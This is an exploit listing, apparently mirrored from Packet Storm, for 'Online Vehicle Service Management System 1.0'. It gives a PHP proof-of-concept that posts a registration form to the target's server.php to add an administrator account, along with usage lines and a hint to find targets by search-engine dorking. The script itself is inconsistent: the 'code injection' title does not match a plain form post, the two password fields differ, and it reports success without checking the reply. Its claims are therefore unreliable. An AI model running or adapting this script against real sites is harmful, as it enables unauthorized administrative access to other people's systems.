Share
## https://sploitus.com/exploit?id=PACKETSTORM:215035
=============================================================================================================================================
    | # Title     : Online Vehicle Service Management System 1.0 Code Injection Vulnerability                                                   |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |
    | # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202303/kashipara.com_vehicle-service-mangement-.zip           |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking ฤฐn Google Or Other Search Enggine.
    
    [+] Exploitation allows adding a new admin .
    
    [+] save code as poc.php .
    
    [+] USage : cmd => c:\www\test\php poc.php target.dz
    
    [+] PayLoad :
    
    <?php
    
    function add_admin_user($website) {
     
        $post_fields = array(
           	'reg_user' => '',
            'username' => 'indoushka',
            'email' => 'indoushka@04.dz',
            'password_1' => '161286@S@m!a',
            'password_2' => '!N0vIs',
            
            'qty' => '1'
        );
    
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "$website/server.php");
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    
        $response = curl_exec($ch);
        curl_close($ch);
    
        echo "(+) Admin Add Successfully...\n";
    }
    
    if ($argc != 2) {
        echo "(+) Usage: php " . $argv[0] . " <website URL>\n";
        echo "(+) Example: php " . $argv[0] . " http://example.com\n";
        exit(-1);
    }
    
    $website = $argv[1];
    add_admin_user($website);
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================